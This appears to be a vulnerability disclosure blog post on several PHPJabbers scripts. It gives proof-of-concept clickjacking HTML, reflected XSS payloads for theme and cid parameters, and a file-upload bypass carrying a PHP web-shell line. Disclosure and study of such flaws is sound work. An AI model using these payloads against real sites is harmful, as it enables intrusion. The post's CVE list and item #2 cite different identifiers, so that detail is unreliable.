Multiple vulnerabilities in PHPJabbers — Part 2
Today, I want to follow up the previous post (https://medium.com/@mfortinsec/multiple-vulnerabilities-in-phpjabbers-part-1-6703becb4cd4) about some additional vulnerabilities discovered through a recent collaborative security research project. This was done through a local group called the Atlantic CyberSecurity Collective.
Our team, consisting of a diverse and talented group of researchers, has conducted an extensive security review on the PHPJabbers collection of scripts, and during our research, we came across some significant security vulnerabilities. It’s worth mentioning that these vulnerabilities, if exploited, could potentially pose serious threats to user data and the overall integrity of these products. We submitted our findings to MITRE, a globally recognized cybersecurity standards organization. Consequently, these vulnerabilities were validated and assigned the following Common Vulnerabilities and Exposures (CVE) identifiers:
- CVE-2023–38830
- CVE-2023–39796
- CVE-2023–39770
- CVE-2023–39771
- CVE-2023–39773
- CVE-2023–39774
- CVE-2023–39775
- CVE-2023–39776
Note that we are all professionals with full time jobs and other responsibilities. With the sheer amount of products in the PHP Jabbers lineup and limited time available, we weren’t able to assess every single product. There is a lot of code reuse in those applications, so it would be safe to assume most vulnerabilities are present in other products.
Members of the research group conducted some additional research in PHP Jabbers products and found vulnerabilities which aren’t addressed in this disclosure.
We informed the PHP Jabbers team through their online forms, but were completely ignored. Each of our attempts at communicating these vulnerabilities was met with silence and an almost instantaneous “closed” status to our submitted tickets.
Our intentions behind sharing this information aren’t to tarnish the vendor’s reputation or stir up panic among its user base. Instead, we aim to encourage proactive and transparent collaboration within the cybersecurity community. It’s crucial to remember that we all share the same goal — enhancing the overall security of products and fostering a safer digital world for users.
In the sections to follow, we will delve into each of the identified vulnerabilities:
#1: PII disclosure in Yacht Listing Script
(CVE-2023–38830)
We can export the rentals information.
In the exported CSV we can distinguish a whole credit card number sequence along with it’s expiration date, 3 digit pin and more…
#2: Clickjacking in Car Rental Script
(CVE-2023–39769)
The HTML below demonstrates a simple clickjacking attack.
<style> iframe { position:relative; width:500px; height: 500px; opacity: 0.1; z-index: 2; } div { position:absolute; top:100px; left:100px; z-index: 1; } </style> <div>Test me</div> <iframe src=”https://demo.phpjabbers.com/DEMO_ID/index.php?controller=pjBaseCron&action=pjActionIndex"></iframe>
#3: Reflected XSS in the theme parameter of Car Rental Script
(CVE-2023–39770)
Replace theme parameter value with the following payload: theme10dnel8%22%3e%3cscript%3ealert(1)%3c%2fscript%3eko0so
#4: Reflected XSS in the theme parameter of Taxi Booking Script
(CVE-2023–39771)
Replace theme parameter value with the following payload: theme10dnel8%22%3e%3cscript%3ealert(1)%3c%2fscript%3eko0so
#5: Reflected XSS in the theme parameter of Restaurant Booking System
(CVE-2023–39773)
Replace theme parameter value with the following payload: theme10dnel8%22%3e%3cscript%3ealert(1)%3c%2fscript%3eko0so
#6: Reflected XSS in the theme parameter of Event Booking Calendar
(CVE-2023–39774)
Replace theme parameter value with the following payload: theme10dnel8%22%3e%3cscript%3ealert(1)%3c%2fscript%3eko0so
#7: Reflected XSS in the cid parameter of Hotel Booking Script
(CVE-2023–39775)
Replace cid parameter value with the following payload: r5wx9%22%3e%3cscript%3ealert(‘BCK’)%3c%2fscript%3edv7zh
#8: Unrestriced File Upload in Ticket Support Script
(CVE-2023–39776)
Upload a file that respects the front end file extension validation such as a PDF, PNG or a JPG and capture the request.
In the request edit the filename to another extension and the content-type header to a value matching your extension.
Content-Disposition: form-data; name=”files[]”; filename=”boat.php”
Content-Type: application/x-www-form-urlencoded
<?php system($_GET[‘cmd’]); ?>
Now if we go to the admin panel, at Tickets and open the ticket we sent we should see that our php file was succesfully uploaded. This DOES NOT enable RCE as the file is simply downloaded but it could be abused to send potentially harmful files such as malware.
